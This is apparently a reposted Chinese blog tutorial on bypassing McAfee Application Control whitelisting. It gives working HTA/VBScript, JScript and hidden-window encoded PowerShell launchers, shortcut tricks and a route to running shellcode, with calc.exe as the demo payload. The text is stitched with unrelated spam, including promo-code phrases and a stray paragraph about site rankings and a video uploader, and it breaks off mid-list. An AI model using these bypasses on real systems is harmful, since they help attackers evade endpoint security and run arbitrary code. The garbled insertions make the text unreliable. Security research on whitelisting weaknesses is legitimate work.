Bypass McAfee Application Cont

应用白名单（Application Whitelisting）是用来防止未认证程序运行的一个计算机管理实践。它的目的是保护计算机和网络不受应用伤害。McAfee Application Control作为其中比较有代表性的产品，使用动态的信任模型，避免了单调的人工更新许可清单工作mcafee促销代码2016。由于企业会面临来自网络的大量未知软件，因此这款可以集中管理的解决方案有助于及时控制系统安全策略，满足企业的运营需求。

截至投稿日期，该站建立时间29天，其实该案例排名已经稳定了两周。各种换浏览器，火狐的最新版，24.0版，15.0.1版，谷歌最新，e'dge，ie11全部没法兼容，网上的方法基本都试遍.才发现..。截至该版投稿时，这个丧心病狂的up主已经投了三个鬼畜作品，分别为《危险的籽岷》、《我的飞翔使》和《最终鬼畜籽岷》。

McAfee Application Control对常见文件类型如exe、dll、bat作了限制，白名单外的这些文件均无法运行mcafee促销代码2016。所以这次的目标就是绕过限制来执行文件。

操作系统：win7x86

到填写信息并安装

管理员权限执行McAfee Solidifier 命令行

1.查看许可证是否安装

执行

sadmin license list

2.添加许可证

在McAfee_Application_Control_v6_2_0_License.txt中会有

执行

sadmin license add 2708-0108-1402-2208-0710

如图

3.重启服务Application Control service

执行

net stop scsrvc
net start scsrvc

1.创建白名单规则

执行

sadmin solidify

需要等待很长一段时间，为当前系统中的所有文件创建规则，如果未添加许可证，该功能无法使用

2.查看白名单状态

执行

sadmin status

确保状态为Solidified

如图

1.开启程序控制，禁止白名单以外的程序运行

执行

sadmin enable

如图

重启系统,重启服务，执行

net stop scsrvc
net start scsrvc

2.查看状态

执行

sadmin status

确保McAfee Solidifier状态为Enabled

重启后如图

3.测试

新建一些测试文件

执行

sadmin list-unsolidified

查看白名单以外的程序

如图

执行

sadmin scripts list

查看禁止执行的文件类型

如图

分别执行exe、bat、dll，均被限制，如图

无法执行自己的程序

根据白名单系统的特点，绕过的思路如下：

找到系统中的特定白名单程序

利用该程序执行代码

编写代码使其执行我们自己的程序

找到系统中未被拦截的特定程序

利用该程序执行代码

编写代码使其执行我们自己的程序

最终我们还是做到了：D

利用hta文件

Tips：

hta是HTML Applications的缩写，是利用HTML和Dynamic HTML(DHTML)开发应用程序

利用如下代码即可通过hta执行vbs

#!html
<HTML> 
<HEAD> 
<script language="VBScript">
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
</script>
</HEAD> 
<BODY> 
</BODY> 
</HTML> 

如图

然而并不完美，hta的界面会默认显示，所以我们需要进一步修改来隐藏hta的主界面

加入属性指定hta执行后最小化显示，完整的代码如下

#!html
<HTML> 
<HEAD> 
<script language="VBScript">
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 

保存为vbs.hta,执行如图

jscript未被McAfee Application Control限制，因此可以被利用

如下代码保存为calc.js

#!js
var objShell = new ActiveXObject("WScript.shell");
objShell.run('calc.exe');

执行成功，如图

如果可以执行powershell代码，还担心绕不过McAfee Application Control吗？

当然，默认是肯定无法执行的，如图

方法1：

将ps1文件内容保存为script.txt，然后进入Powershell环境执行如下代码：

Get-Content script.txt | iex

但是如果txt中含有函数，会产生如下错误，需要更改脚本内容，错误如图

方法2：

利用hta可以执行vbs，再用vbs执行Powershell

使用如下代码并保存为vbs+ps.hta

#!html
<HTML> 
<HEAD> 
<script language="VBScript">
    Set WshShell = CreateObject("WScript.Shell")
    Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
    WshShell.Run Connect, 4, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 

执行后先调用vbs脚本，再执行Powershell命令

方法3：

利用快捷方式执行Powershell

右键新建一个快捷方式，填入如下代码，并保存为ps.lnk

powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA==

如图

运行快捷方式后执行Powershell命令，弹出计算器

方法4：

利用Powershell环境直接执行，简单粗暴

cmd下执行Powershell.exe进入Powershell环境，然后在下面直接输入所有命令即可

目前我们已经可以在安装McAfee Application Control的系统中执行vbs、jscript、Powershell，那么利用上述方法可以实现什么呢？

方法1：

利用vbs,将shellcode转为vbs，然后通过hta执行

参考地址：

方法2：

利用js

方法3：

利用Powershell

在之前的文章对通过Powershell执行shellcode有过详细介绍，对其中的ps1文件细节作简单修改保存为1-CodeExecution-Shellcode.ps1

进入Powershell环境，然后在里面执行1-CodeExecution-Shellcode.ps1的所有内容

如图

方法4：

利用InstallUtil

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-101840-1.html